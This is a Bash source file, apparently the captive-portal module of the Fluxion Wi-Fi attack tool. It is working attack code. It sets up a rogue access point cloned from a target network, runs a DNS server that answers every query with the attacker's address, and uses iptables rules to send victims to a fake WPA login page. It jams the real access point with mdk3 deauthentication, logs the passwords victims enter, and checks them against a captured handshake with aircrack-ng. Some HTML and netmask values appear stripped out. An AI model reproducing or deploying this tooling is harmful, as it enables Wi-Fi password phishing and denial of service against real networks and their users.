#!/bin/bash ############################# < Captive Portal Parameters > ############################ CaptivePortalState="Not Ready" CaptivePortalPassLog="$FLUXIONPath/attacks/Captive Portal/pwdlog" CaptivePortalNetLog="$FLUXIONPath/attacks/Captive Portal/netlog" CaptivePortalJamTime="9999999999999" CaptivePortalAuthenticationMethods=("hash") # "wpa_supplicant") CaptivePortalAuthenticationMethodsInfo=("(handshake file, ${CGrn}recommended$CClr)") # "(Target AP authentication, slow)") ########################### < Virtual Network Configuration > ########################## # To avoid collapsing with an already connected network, we'll use an uncommon network. VIGWAddress="" VIGWNetwork=${VIGWAddress%.*} function captive_portal_unset_auth() { if [ ! "$APRogueAuthMode" ]; then return 0; fi if [ "$APRogueAuthMode" = "hash" ]; then unset_hash fi APRogueAuthMode="" # If we've only got one option, then the user skipped this # section by taking that one option, so we unset the previous # phase along with this one to take the user properly back. if [ ${#CaptivePortalAuthenticationMethods[@]} -le 1 ]; then unset_ap_service fi } function captive_portal_set_auth() { if [ "$APRogueAuthMode" ]; then echo "Captive Portal authentication mode is already set, skipping!" > $FLUXIONOutputDevice return 0; fi captive_portal_unset_auth if [ ${#CaptivePortalAuthenticationMethods[@]} -eq 1 -o \ ${#CaptivePortalAuthenticationMethods[@]} -ge 1 -a "$FLUXIONAuto" = 1 ]; then APRogueAuthMode="${CaptivePortalAuthenticationMethods[0]}" else fluxion_header echo -e "$FLUXIONVLine $header_askauth" echo view_target_ap_info local choices=("${CaptivePortalAuthenticationMethods[@]}" "$general_back") io_query_format_fields "" "\t$CRed[$CYel%d$CRed]$CClr %b %b\n" choices[@] \ CaptivePortalAuthenticationMethodsInfo[@] APRogueAuthMode="${IOQueryFormatFields[0]}" if [[ "$APRogueAuthMode" = "$general_back" ]]; then unset_ap_service captive_portal_unset_auth return 1 fi fi if [ "$APRogueAuthMode" = "hash" ]; then set_hash fi if [[ $? -ne 0 ]]; then captive_portal_unset_auth; return 1; fi } function captive_portal_run_certificate_generator() { xterm -title "Generating Self-Signed SSL Certificate" -e openssl req -subj '/CN=captive.router.lan/O=CaptivePortal/OU=Networking/C=US' -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout $FLUXIONWorkspacePath/server.pem -out $FLUXIONWorkspacePath/server.pem # more details there https://www.openssl.org/docs/manmaster/apps/openssl.html chmod 400 $FLUXIONWorkspacePath/server.pem } function captive_portal_unset_cert() { sandbox_remove_workfile "$FLUXIONWorkspacePath/server.pem" } # Create Self-Signed SSL Certificate function captive_portal_set_cert() { # Check existance of ssl certificate with file size > 0 if [ -f $FLUXIONPath/attacks/Captive\ Portal/certificate/server.pem -a \ -s $FLUXIONPath/attacks/Captive\ Portal/certificate/server.pem ]; then cp $FLUXIONPath/attacks/Captive\ Portal/certificate/server.pem \ $FLUXIONWorkspacePath/server.pem fi # Check existance of ssl certificate with file size > 0 if [ -f $FLUXIONWorkspacePath/server.pem -a -s $FLUXIONWorkspacePath/server.pem ]; then echo "Captive Portal certificate is already set, skipping!" > $FLUXIONOutputDevice return 0; fi captive_portal_unset_cert local choices=("$DialogOptionCertificateSource1" "$DialogOptionCertificateSource2" "$general_back") while [ ! -f $FLUXIONWorkspacePath/server.pem -o ! -s $FLUXIONWorkspacePath/server.pem ]; do io_query_choice "$DialogQueryCertificateSource" choices[@] case "$IOQueryChoice" in "$DialogOptionCertificateSource1") captive_portal_run_certificate_generator; break;; "$DialogOptionCertificateSource2") return 2;; "$general_back") captive_portal_unset_auth captive_portal_unset_cert return 1;; *) conditional_bail; return 3;; esac done # Check existance of ssl certificate with file size > 0 # Check again depends on the following conditional. # I could move it, but I don't want to... #if [ ! -f $FLUXIONWorkspacePath/server.pem -o ! -s $FLUXIONWorkspacePath/server.pem ]; then # FLUXIONNextOperation="Certificate" #fi } function captive_portal_unset_site() { sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal" } function captive_portal_set_site() { if [ -d $FLUXIONWorkspacePath/captive_portal ]; then echo "Captive Portal site (interface) is already set, skipping!" > $FLUXIONOutputDevice return 0; fi captive_portal_unset_interface local sites # Retrieve all available portal sites and # store them without the .portal extension. for site in attacks/Captive\ Portal/sites/generic/* attacks/Captive\ Portal/sites/*.portal; do site="${site/attacks\/Captive\ Portal\/sites\//}" if [[ "$site" != *.portal ]]; then site="${DialogOptionCaptivePortalGeneric}_${site/generic\//}" fi sites[${#sites[@]}]="${site/.portal/}" done local sitesIdentifier=("${sites[@]/_*/}" "$general_back") local sitesLanguage=("${sites[@]/*_/}") fluxion_header view_target_ap_info io_query_format_fields "$FLUXIONVLine $DialogQueryCaptivePortalInterface" \ "$CRed[$CYel%02d$CRed]$CClr %-38b $CBlu[%10s]$CClr\n" \ sitesIdentifier[@] sitesLanguage[@] local site="${IOQueryFormatFields[0]}" local siteLanguage="${IOQueryFormatFields[1]}" local sitePath="${site}_${siteLanguage}" case "$site" in "$DialogOptionCaptivePortalGeneric") source $FLUXIONPath/attacks/Captive\ Portal/sites/generic/$siteLanguage captive_portal_generic;; "$general_back") captive_portal_unset_cert captive_portal_unset_site return 1;; * ) mkdir $FLUXIONWorkspacePath/captive_portal &>$FLUXIONOutputDevice cp -r $FLUXIONPath/attacks/Captive\ Portal/sites/$sitePath.portal/* $FLUXIONWorkspacePath/captive_portal;; esac } function captive_portal_unset_attack() { sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" sandbox_remove_workfile "$FLUXIONWorkspacePath/fluxion_captive_portal_dns" sandbox_remove_workfile "$FLUXIONWorkspacePath/lighttpd.conf" sandbox_remove_workfile "$FLUXIONWorkspacePath/dhcpd.leases" sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal/check.php" # Only reset the AP if one has been define. if [ $(type -t ap_reset) ]; then ap_reset fi } # Create different settings required for the script function captive_portal_set_attack() { # AP Service: Prepare service for an attack. ap_prep # Generate the PHP check.php script, used to verify # password attempts from users using the web interface. echo "\ " > $FLUXIONWorkspacePath/captive_portal/check.php # Generate the dhcpd configuration file, which is # used to provide DHCP service to APRogue clients. echo "\ authoritative; default-lease-time 600; max-lease-time 7200; subnet $VIGWNetwork.0 netmask { option broadcast-address $VIGWNetwork.255; option routers $VIGWAddress; option subnet-mask; option domain-name-servers $VIGWAddress; range $VIGWNetwork.100 $VIGWNetwork.254; }\ " > $FLUXIONWorkspacePath/dhcpd.conf #create an empty leases file touch $FLUXIONWorkspacePath/dhcpd.leases # Generate configuration for a lighttpd web-server. echo "\ server.document-root = \"$FLUXIONWorkspacePath/captive_portal/\" server.modules = ( \"mod_access\", \"mod_alias\", \"mod_accesslog\", \"mod_fastcgi\", \"mod_redirect\", \"mod_rewrite\" ) fastcgi.server = ( \".php\" => ( ( \"bin-path\" => \"/usr/bin/php-cgi\", \"socket\" => \"/php.socket\" ) ) ) server.port = 80 server.pid-file = \"/var/run/lighttpd.pid\" # server.username = \"www\" # server.groupname = \"www\" mimetype.assign = ( \".html\" => \"text/html\", \".htm\" => \"text/html\", \".txt\" => \"text/plain\", \".jpg\" => \"image/jpeg\", \".png\" => \"image/png\", \".css\" => \"text/css\" ) server.error-handler-404 = \"/\" static-file.exclude-extensions = ( \".fcgi\", \".php\", \".rb\", \"~\", \".inc\" ) index-file.names = ( \"index.htm\", \"index.html\" ) \$SERVER[\"socket\"] == \":443\" { ssl.engine = \"enable\" ssl.pemfile = \"$FLUXIONWorkspacePath/server.pem\" } #Redirect www.domain.com to domain.com \$HTTP[\"host\"] =~ \"^www\.(.*)$\" { url.redirect = ( \"^/(.*)\" => \"http://%1/\$1\" ) } " > $FLUXIONWorkspacePath/lighttpd.conf # Create a DNS service with python, forwarding all traffic to gateway. echo "\ import socket class DNSQuery: def __init__(self, data): self.data=data self.dominio='' tipo = (ord(data[2]) >> 3) & 15 if tipo == 0: ini=12 lon=ord(data[ini]) while lon != 0: self.dominio+=data[ini+1:ini+lon+1]+'.' ini+=lon+1 lon=ord(data[ini]) def respuesta(self, ip): packet='' if self.dominio: packet+=self.data[:2] + \"\x81\x80\" packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00' packet+=self.data[12:] packet+='\xc0\x0c' packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) return packet if __name__ == '__main__': ip='$VIGWAddress' print 'pyminifakeDwebconfNS:: dom.query. 60 IN A %s' % ip udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) udps.bind(('',53)) try: while 1: data, addr = udps.recvfrom(1024) p=DNSQuery(data) udps.sendto(p.respuesta(ip), addr) print 'Request: %s -> %s' % (p.dominio, ip) except KeyboardInterrupt: print 'Finalizando' udps.close()\ " > $FLUXIONWorkspacePath/fluxion_captive_portal_dns chmod +x $FLUXIONWorkspacePath/fluxion_captive_portal_dns #if [ $APRogueAuthMode = "hash" ]; then # echo "" >> $FLUXIONWorkspacePath/captive_portal_authenticator.sh #elif [ $APRogueAuthMode = "wpa_supplicant" ]; then # echo "" >> $FLUXIONWorkspacePath/captive_portal_authenticator.sh #fi # Attack arbiter script echo "\ #!/bin/bash function signal_stop_attack() { kill -s SIGABRT $$ # Signal STOP ATTACK } function handle_abort_authenticator() { AuthenticatorState=\"aborted\" } trap signal_stop_attack SIGINT SIGHUP trap handle_abort_authenticator SIGABRT echo > $FLUXIONWorkspacePath/candidate.txt echo -n \"0\"> $FLUXIONWorkspacePath/hit.txt echo > $FLUXIONWorkspacePath/wpa_supplicant.log # Make console cursor invisible, cnorm to revert. tput civis clear m=0 h=0 s=0 i=0 AuthenticatorState=\"running\" startTime=\$(date +%s) while [ \$AuthenticatorState = \"running\" ]; do let s=\$(date +%s)-\$startTime d=\`expr \$s / 86400\` s=\`expr \$s % 86400\` h=\`expr \$s / 3600\` s=\`expr \$s % 3600\` m=\`expr \$s / 60\` s=\`expr \$s % 60\` if [ \"\$s\" -le 9 ]; then is=\"0\" else is= fi if [ \"\$m\" -le 9 ]; then im=\"0\" else im= fi if [ \"\$h\" -le 9 ]; then ih=\"0\" else ih= fi if [ -f $FLUXIONWorkspacePath/pwdattempt.txt -a -s $FLUXIONWorkspacePath/pwdattempt.txt ]; then # Save any new password attempt. cat $FLUXIONWorkspacePath/pwdattempt.txt >> \"$CaptivePortalPassLog/$APTargetSSID-$APTargetMAC.log\" # Clear logged password attempt. echo -n > $FLUXIONWorkspacePath/pwdattempt.txt fi " >> $FLUXIONWorkspacePath/captive_portal_authenticator.sh if [ $APRogueAuthMode = "hash" ]; then echo " if [ -f $FLUXIONWorkspacePath/candidate_result.txt ]; then # Check if we've got the correct password by looking for anything other than \"Passphrase not in\". if ! aircrack-ng -w $FLUXIONWorkspacePath/candidate.txt $FLUXIONWorkspacePath/$APTargetSSIDClean-$APTargetMAC.cap | grep -qi \"Passphrase not in\"; then echo \"2\" > $FLUXIONWorkspacePath/candidate_result.txt break else echo \"1\" > $FLUXIONWorkspacePath/candidate_result.txt fi fi" >> $FLUXIONWorkspacePath/captive_portal_authenticator.sh elif [ $APRogueAuthMode = "wpa_supplicant" ]; then echo " wpa_passphrase \"$APTargetSSID\" \"\`cat $FLUXIONWorkspacePath/candidate.txt\`\" > $FLUXIONWorkspacePath/wpa_supplicant.conf wpa_supplicant -i $WIAccessPoint -c $FLUXIONWorkspacePath/wpa_supplicant.conf -f $FLUXIONWorkspacePath/wpa_supplicant.log & wpaSupplicantPID=\$! # Shitty design... sleep 5 if [ -f $FLUXIONWorkspacePath/candidate_result.txt ]; then if grep -i 'WPA: Key negotiation completed' $FLUXIONWorkspacePath/wpa_supplicant.log; then echo \"2\" > $FLUXIONWorkspacePath/candidate_result.txt break else echo \"1\" > $FLUXIONWorkspacePath/candidate_result.txt fi fi" >> $FLUXIONWorkspacePath/captive_portal_authenticator.sh fi echo " DHCPClients=($(nmap -PR -sn -n -oG - $VIGWNetwork.100-110 2>&1 | grep Host)) echo echo -e \" ACCESS POINT:\" echo -e \" SSID ...........: "$CWht"$APTargetSSID"$CClr"\" echo -e \" MAC ............: "$CYel"$APTargetMAC"$CClr"\" echo -e \" Channel ........: "$CWht"$APTargetChannel"$CClr"\" echo -e \" Vendor .........: "$CGrn"${APTargetMaker:-UNKNOWN}"$CClr"\" echo -e \" Runtime ........: "$CBlu"\$ih\$h:\$im\$m:\$is\$s"$CClr"\" echo -e \" Attempts .......: "$CRed"\$(cat $FLUXIONWorkspacePath/hit.txt)"$CClr"\" echo -e \" Clients ........: "$CBlu"\$(cat $FLUXIONWorkspacePath/clients.txt | grep DHCPACK | awk '{print \$5}' | sort| uniq | wc -l)"$CClr"\" echo echo -e \" CLIENTS ONLINE:\" x=0 for client in \"\${DHCPClients[@]}\"; do x=\$((\$x+1)) ClientIP=\$(echo \$client| cut -d \" \" -f2) ClientMAC=\$(nmap -PR -sn -n \$ClientIP 2>&1 | grep -i mac | awk '{print \$3}' | tr [:upper:] [:lower:]) if [ \"\$(echo \$ClientMAC| wc -m)\" != \"18\" ]; then ClientMAC=\"xx:xx:xx:xx:xx:xx\" fi ClientMID=\$(macchanger -l | grep \"\$(echo \"\$ClientMAC\" | cut -d \":\" -f -3)\" | cut -d \" \" -f 5-) if echo \$ClientMAC| grep -q x; then ClientMID=\"unknown\" fi ClientHostname=\$(grep \$ClientIP $FLUXIONWorkspacePath/clients.txt | grep DHCPACK | sort | uniq | head -1 | grep '(' | awk -F '(' '{print \$2}' | awk -F ')' '{print \$1}') echo -e \" $CGrn \$x) $CRed\$ClientIP $CYel\$ClientMAC $CClr($CBlu\$ClientMID$CClr) $CGrn \$ClientHostname$CClr\" done echo -ne \"\033[K\033[u\"" >> $FLUXIONWorkspacePath/captive_portal_authenticator.sh if [ $APRogueAuthMode = "hash" ]; then echo " sleep 1" >> $FLUXIONWorkspacePath/captive_portal_authenticator.sh elif [ $APRogueAuthMode = "wpa_supplicant" ]; then echo " killall \$wpaSupplicantPID &> $FLUXIONOutputDevice " >> $FLUXIONWorkspacePath/captive_portal_authenticator.sh fi echo " done if [ \$AuthenticatorState = \"aborted\" ]; then exit 1; fi clear echo \"1\" > $FLUXIONWorkspacePath/status.txt # sleep 7 sleep 3 signal_stop_attack # killall mdk3 &> $FLUXIONOutputDevice # killall aireplay-ng &> $FLUXIONOutputDevice # killall airbase-ng &> $FLUXIONOutputDevice # kill \$(ps a | grep python | grep fluxion_captive_portal_dns | awk '{print \$1}') &> $FLUXIONOutputDevice # killall hostapd &> $FLUXIONOutputDevice # killall lighttpd &> $FLUXIONOutputDevice # killall dhcpd &> $FLUXIONOutputDevice # if [ \"$APRogueAuthMode\" = \"wpa_supplicant\" ]; then # killall wpa_supplicant &> $FLUXIONOutputDevice # fi # killall wpa_passphrase &> $FLUXIONOutputDevice echo \" FLUXION $FLUXIONVersion SSID: $APTargetSSID BSSID: $APTargetMAC ($APTargetMaker) Channel: $APTargetChannel Security: $APTargetEncryption Time: \$ih\$h:\$im\$m:\$is\$s Password: \$(cat $FLUXIONWorkspacePath/candidate.txt) \" >\"$CaptivePortalNetLog/$APTargetSSID-$APTargetMAC.log\"" >> $FLUXIONWorkspacePath/captive_portal_authenticator.sh if [ $APRogueAuthMode = "hash" ]; then echo " aircrack-ng -a 2 -b $APTargetMAC -0 -s $FLUXIONWorkspacePath/$APTargetSSIDClean-$APTargetMAC.cap -w $FLUXIONWorkspacePath/candidate.txt && echo && echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/$APTargetSSID-$APTargetMAC.log"$CClr"\"\ " >> $FLUXIONWorkspacePath/captive_portal_authenticator.sh elif [ $APRogueAuthMode = "wpa_supplicant" ]; then echo " echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/$APTargetSSID-$APTargetMAC.log"$CClr"\"\ " >> $FLUXIONWorkspacePath/captive_portal_authenticator.sh fi # echo " # kill -INT \$(ps a | grep bash| grep flux | awk '{print \$1}') &> $FLUXIONOutputDevice\ # " >> $FLUXIONWorkspacePath/captive_portal_authenticator.sh chmod +x $FLUXIONWorkspacePath/captive_portal_authenticator.sh } # Generate the contents for a generic web interface function captive_portal_generic() { if [ ! -d $FLUXIONWorkspacePath/captive_portal ]; then mkdir $FLUXIONWorkspacePath/captive_portal fi source $FLUXIONPath/lib/site/index | base64 -d > $FLUXIONWorkspacePath/file.zip unzip $FLUXIONWorkspacePath/file.zip -d $FLUXIONWorkspacePath/captive_portal &>$FLUXIONOutputDevice sandbox_remove_workfile "$FLUXIONWorkspacePath/file.zip" echo "\ Wireless Protected Access: Verifying


" > $FLUXIONWorkspacePath/captive_portal/final.html echo "\ Wireless Protected Access: Key Mismatch


" > $FLUXIONWorkspacePath/captive_portal/error.html echo "\ Wireless Protected Access: Login

$APTargetSSID ($APTargetMAC)

" > $FLUXIONWorkspacePath/captive_portal/index.html } # Set up DHCP / WEB server # Set up DHCP / WEB server function captive_portal_set_routes() { # Give an address to the gateway interface in the network. ifconfig $VIGW $VIGWAddress netmask # Add a route to the virtual gateway interface. route add -net $VIGWNetwork.0 netmask gw $VIGWAddress # Activate system IPV4 packet routing/forwarding. sysctl -w net.ipv4.ip_forward=1 &>$FLUXIONOutputDevice iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination $VIGWAddress:80 iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination $VIGWAddress:443 iptables -A INPUT -p tcp --sport 443 -j ACCEPT iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT iptables -t nat -A POSTROUTING -j MASQUERADE } function unprep_attack() { CaptivePortalState="Not Ready" captive_portal_unset_attack captive_portal_unset_site captive_portal_unset_cert captive_portal_unset_auth unset_ap_service } function prep_attack() { while true; do set_ap_service; if [ $? -ne 0 ]; then break; fi captive_portal_set_auth; if [ $? -ne 0 ]; then continue; fi captive_portal_set_cert; if [ $? -ne 0 ]; then continue; fi captive_portal_set_site; if [ $? -ne 0 ]; then continue; fi captive_portal_set_attack; if [ $? -ne 0 ]; then continue; fi CaptivePortalState="Ready" break done # Check for prep abortion. if [ "$CaptivePortalState" = "Not Ready" ]; then unprep_attack return 1; fi } function stop_attack() { # Attempt to find PIDs of any running authenticators. local authenticatorPID=$(ps a | grep -vE "xterm|grep" | grep captive_portal_authenticator.sh | awk '{print $1}') # Signal any authenticator to stop authentication loop. if [ "$authenticatorPID" ]; then kill -s SIGABRT $authenticatorPID; fi killall mdk3 &> $FLUXIONOutputDevice local FLUXIONJammer=$(ps a | grep -e "FLUXION AP Jammer" | awk '{print $1'}) if [ "$FLUXIONJammer" ]; then kill $FLUXIONJammer &> $FLUXIONOutputDevice fi # Kill captive portal web server. if [ $CaptivePortalServerPID ]; then kill $CaptivePortalServerPID &> $FLUXIONOutputDevice CaptivePortalServerPID="" fi # Kill python DNS service if one is found. local FLUXIONDNS=$(ps a | grep -e "FLUXION AP DNS" | awk '{print $1'}) if [ "$FLUXIONDNS" ]; then kill $FLUXIONDNS &> $FLUXIONOutputDevice fi # Kill DHCP service. local FLUXIONDHCP=$(ps a | grep -e "FLUXION AP DHCP" | awk '{print $1'}) if [ "$FLUXIONDHCP" ]; then kill $FLUXIONDHCP &> $FLUXIONOutputDevice fi ap_stop } function start_attack() { if [ "$CaptivePortalState" = "Running" ]; then return 0; fi stop_attack echo -e "$FLUXIONVLine Starting Captive Portal access point service..." ap_start echo -e "$FLUXIONVLine Starting Captive Portal access point routes..." captive_portal_set_routes & sleep 3 fuser -n tcp -k 53 67 80 443 &> $FLUXIONOutputDevice fuser -n udp -k 53 67 80 443 &> $FLUXIONOutputDevice echo -e "$FLUXIONVLine Starting access point DHCP service as daemon..." xterm -bg black -fg green $TOPLEFT -title "FLUXION AP DHCP Service" -e "dhcpd -d -f -lf "$FLUXIONWorkspacePath/dhcpd.leases" -cf "$FLUXIONWorkspacePath/dhcpd.conf" $VIGW 2>&1 | tee -a $FLUXIONWorkspacePath/clients.txt" & echo -e "$FLUXIONVLine Starting access point DNS service as daemon..." xterm $BOTTOMLEFT -bg "#000000" -fg "#99CCFF" -title "FLUXION AP DNS Service" -e "if type python2 >/dev/null 2>/dev/null; then python2 $FLUXIONWorkspacePath/fluxion_captive_portal_dns; else python $FLUXIONWorkspacePath/fluxion_captive_portal_dns; fi" & echo -e "$FLUXIONVLine Starting access point captive portal as daemon..." lighttpd -f $FLUXIONWorkspacePath/lighttpd.conf &> $FLUXIONOutputDevice CaptivePortalServerPID=$! echo -e "$FLUXIONVLine Starting access point jammer as daemon..." echo -e "$APTargetMAC" > $FLUXIONWorkspacePath/mdk3.txt xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "FLUXION AP Jammer [mdk3] $APTargetSSID" -e mdk3 $WIMonitor d -b $FLUXIONWorkspacePath/mdk3.txt -c $APTargetChannel & echo -e "$FLUXIONVLine Starting authenticator script..." xterm -hold $TOPRIGHT -title "FLUXION AP Authenticator" -e $FLUXIONWorkspacePath/captive_portal_authenticator.sh & } # FLUXSCRIPT END